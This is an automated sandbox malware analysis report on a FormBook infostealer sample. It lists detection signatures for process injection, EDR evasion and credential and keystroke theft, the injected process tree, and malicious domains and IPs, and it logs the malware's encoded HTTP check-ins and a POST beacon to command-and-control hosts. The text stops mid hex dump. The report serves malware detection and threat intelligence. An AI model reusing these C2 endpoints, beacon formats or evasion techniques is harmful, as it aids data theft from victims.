Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yloe82Jp1k.exe

Overview

General Information

Sample name:yloe82Jp1k.exe
renamed because original name is a hash value
Original sample name:30ef142c1d8c28c6e01c36ef3ff7eb2b4f6b45e461190764db1c79ea84c3c301.exe
Analysis ID:1632415
MD5:efb76d347629a705bca39f2de31c52fe
SHA1:96d30f8d1b431f158a54d72774fa77b6a30676ac
SHA256:30ef142c1d8c28c6e01c36ef3ff7eb2b4f6b45e461190764db1c79ea84c3c301
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • yloe82Jp1k.exe (PID: 7684 cmdline: "C:\Users\user\Desktop\yloe82Jp1k.exe" MD5: EFB76D347629A705BCA39F2DE31C52FE)
    • svchost.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\yloe82Jp1k.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • p6WXW8QjBjt0nco5J.exe (PID: 500 cmdline: "C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\5QVRKgwEfPM.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • sfc.exe (PID: 2724 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
          • p6WXW8QjBjt0nco5J.exe (PID: 3944 cmdline: "C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\FVu1flF34.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 2224 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.3633190664.00000000025B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.3635217909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1495187860.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.1496350328.0000000003690000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.3635090476.00000000035D0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\yloe82Jp1k.exe", CommandLine: "C:\Users\user\Desktop\yloe82Jp1k.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\yloe82Jp1k.exe", ParentImage: C:\Users\user\Desktop\yloe82Jp1k.exe, ParentProcessId: 7684, ParentProcessName: yloe82Jp1k.exe, ProcessCommandLine: "C:\Users\user\Desktop\yloe82Jp1k.exe", ProcessId: 7708, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\yloe82Jp1k.exe", CommandLine: "C:\Users\user\Desktop\yloe82Jp1k.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\yloe82Jp1k.exe", ParentImage: C:\Users\user\Desktop\yloe82Jp1k.exe, ParentProcessId: 7684, ParentProcessName: yloe82Jp1k.exe, ProcessCommandLine: "C:\Users\user\Desktop\yloe82Jp1k.exe", ProcessId: 7708, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:37:15.189218+010028563181A Network Trojan was detected192.168.2.449749202.61.85.5380TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: yloe82Jp1k.exeAvira: detected
                Source: http://www.cruycq.info/0vwm/Avira URL Cloud: Label: malware
                Source: http://www.qzsazi.info/iwsk/?7v=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&8lQxv=ijsXKAvira URL Cloud: Label: malware
                Source: http://www.l33900.xyz/gwiz/Avira URL Cloud: Label: malware
                Source: http://www.sigaque.today/n61y/Avira URL Cloud: Label: malware
                Source: http://www.031233226.xyz/elns/?8lQxv=ijsXK&7v=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=Avira URL Cloud: Label: malware
                Source: http://www.l33900.xyz/gwiz/?7v=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&8lQxv=ijsXKAvira URL Cloud: Label: malware
                Source: http://www.cruycq.info/0vwm/?7v=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&8lQxv=ijsXKAvira URL Cloud: Label: malware
                Source: http://www.qzsazi.info/iwsk/Avira URL Cloud: Label: malware
                Source: yloe82Jp1k.exeVirustotal: Detection: 70%Perma Link
                Source: yloe82Jp1k.exeReversingLabs: Detection: 81%
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3633190664.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3635217909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1495187860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1496350328.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3635090476.00000000035D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3635125168.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1497049983.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: yloe82Jp1k.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: wntdll.pdbUGP source: yloe82Jp1k.exe, 00000000.00000003.1196009386.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, yloe82Jp1k.exe, 00000000.00000003.1192344346.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1399882340.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1401695247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1496389029.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1496389029.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000009.00000003.1503765904.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3635502076.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000009.00000003.1496652505.0000000002C70000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3635502076.000000000317E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: yloe82Jp1k.exe, 00000000.00000003.1196009386.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, yloe82Jp1k.exe, 00000000.00000003.1192344346.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1399882340.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1401695247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1496389029.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1496389029.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, sfc.exe, 00000009.00000003.1503765904.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3635502076.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000009.00000003.1496652505.0000000002C70000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3635502076.000000000317E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: sfc.pdb source: svchost.exe, 00000001.00000003.1463563818.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1463665570.0000000003024000.00000004.00000020.00020000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 00000008.00000002.3634389149.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000001.00000003.1463563818.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1463665570.0000000003024000.00000004.00000020.00020000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 00000008.00000002.3634389149.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: p6WXW8QjBjt0nco5J.exe, 00000008.00000000.1418644960.000000000063F000.00000002.00000001.01000000.00000007.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3633172478.000000000063F000.00000002.00000001.01000000.00000007.sdmp
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007E4696
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EC93C FindFirstFileW,FindClose,0_2_007EC93C
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007EC9C7
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007EF200
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007EF35D
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007EF65E
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007E3A2B
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007E3D4E
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007EBF27
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025CC9A0 FindFirstFileW,FindNextFileW,FindClose,9_2_025CC9A0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 4x nop then xor eax, eax9_2_025B9F40
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 4x nop then pop edi9_2_025BE52F
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 4x nop then mov ebx, 00000004h9_2_02DC04E8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49749 -> 202.61.85.53:80
                Source: DNS query: www.031233226.xyz
                Source: DNS query: www.l33900.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
                Source: Joe Sandbox ViewIP Address: 202.61.85.53 202.61.85.53
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007F25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007F25E2
                Source: global trafficHTTP traffic detected: GET /elns/?8lQxv=ijsXK&7v=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.031233226.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cu04/?8lQxv=ijsXK&7v=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.woodsplace.netUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n61y/?7v=BOlfS7N9ZWkGRIMQvtCcANCNb3qAqq3eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBL6eCiEJPRGlRejti0K3snW3AOM+4UQW8vy0=&8lQxv=ijsXK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.sigaque.todayUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0vwm/?7v=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&8lQxv=ijsXK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.cruycq.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /iwsk/?7v=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&8lQxv=ijsXK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.qzsazi.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gwiz/?7v=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&8lQxv=ijsXK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.l33900.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /5okx/?7v=rcIZgusooP3F15rK+5DIcNNMsZej2PIMDSMXn/eRfDMVJgFB6bjmi/bQhBXB6mE8kMRzhYMkKhir5mDouZLbTlV5qa5dT9KAJ6DieZnNw5qMdCf52tMTcpI=&8lQxv=ijsXK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.milp.storeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8g01/?7v=FK1b7Kdc3jRmrp0mexgHyQ1hd3sVrC8++A1Kno/YCawUR9DsY54GtGrwZsEDsoB/YG7JlShMTqipBNKL1Nc8Hgx4gs1jC8EmfkVe7XhYo4pM/oZfErj3D08=&8lQxv=ijsXK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.dodowo.shopUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /q6tn/?8lQxv=ijsXK&7v=a9XpPJI/g468snPpmYXmOEBKUp82e4Qm8pbKtEIG/rWptSKHGLi8G+XYrNsUafrcBLQi8uEi+c18CJn/0avstowqbP/tBFDHjPQxx+XOPOc14ETuwbfjVp0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.16544.pizzaUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dv29/?7v=lyDuWv8anyDzCsrtEaP1x1XFObORQZNc3G6wsV0rNYv9zNmSH7KTJBB1K2WfFvHvPOh/z5cHktk3l1356pnt/umVIV47p1LqcDVpVRi21fe+0Ni9uNog+6o=&8lQxv=ijsXK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.comebackhome.onlineUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.031233226.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vipstargold.buzz
                Source: global trafficDNS traffic detected: DNS query: www.woodsplace.net
                Source: global trafficDNS traffic detected: DNS query: www.sigaque.today
                Source: global trafficDNS traffic detected: DNS query: www.kitculture.shop
                Source: global trafficDNS traffic detected: DNS query: www.f66el619d.shop
                Source: global trafficDNS traffic detected: DNS query: www.alplace.site
                Source: global trafficDNS traffic detected: DNS query: www.cruycq.info
                Source: global trafficDNS traffic detected: DNS query: www.elevatetextiles.net
                Source: global trafficDNS traffic detected: DNS query: www.qzsazi.info
                Source: global trafficDNS traffic detected: DNS query: www.l33900.xyz
                Source: global trafficDNS traffic detected: DNS query: www.milp.store
                Source: global trafficDNS traffic detected: DNS query: www.v89ey584d.shop
                Source: global trafficDNS traffic detected: DNS query: www.dodowo.shop
                Source: global trafficDNS traffic detected: DNS query: www.16544.pizza
                Source: global trafficDNS traffic detected: DNS query: www.comebackhome.online
                Source: unknownHTTP traffic detected: POST /cu04/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 199Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.woodsplace.netOrigin: http://www.woodsplace.netReferer: http://www.woodsplace.net/cu04/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 37 76 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 75 35 6e 4d 47 39 63 37 65 61 6d 2b 48 61 76 63 32 58 4e 31 4d 79 42 64 52 56 4b 54 51 74 77 57 49 35 6e 4f 55 65 6f 4c 6b 57 32 4b 72 48 61 69 33 75 6c 38 62 37 33 37 72 67 4b 76 38 57 76 50 4d 37 6e 30 34 74 76 69 73 43 43 76 44 75 34 6b 31 53 72 65 48 33 46 61 74 63 75 56 38 79 43 50 2b 6c 54 78 30 6a 56 77 66 6a 77 51 33 6f 52 30 68 47 64 42 57 38 79 46 78 33 7a 51 4f 72 5a 47 69 63 6d 67 43 65 36 35 50 47 7a 30 35 71 48 4d 56 33 6f 68 53 34 42 56 41 69 4a 75 34 43 71 59 46 6e 53 48 78 32 73 31 78 6a 47 69 4d 78 31 74 31 79 69 35 46 41 3d 3d Data Ascii: 7v=LgavgYig9OZ/u5nMG9c7eam+Havc2XN1MyBdRVKTQtwWI5nOUeoLkW2KrHai3ul8b737rgKv8WvPM7n04tvisCCvDu4k1SreH3FatcuV8yCP+lTx0jVwfjwQ3oR0hGdBW8yFx3zQOrZGicmgCe65PGz05qHMV3ohS4BVAiJu4CqYFnSHx2s1xjGiMx1t1yi5FA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:34:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:35:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdgoFSmdiPmOEkK7z%2Fjk4iPBf6OKEH1knfmlE73hziNBXW1zLVkT9zHk6kqkGhY%2F%2Flp73F3yaQ7NSA%2B%2Fpu0cs0Fx6pd%2Fo4z%2FF8CvWc%2B3OhLWQQkA1f05bLEGU67SlmZ4mrmF1g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd90642d8cc32e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1572&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=723&delivery_rate=0&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 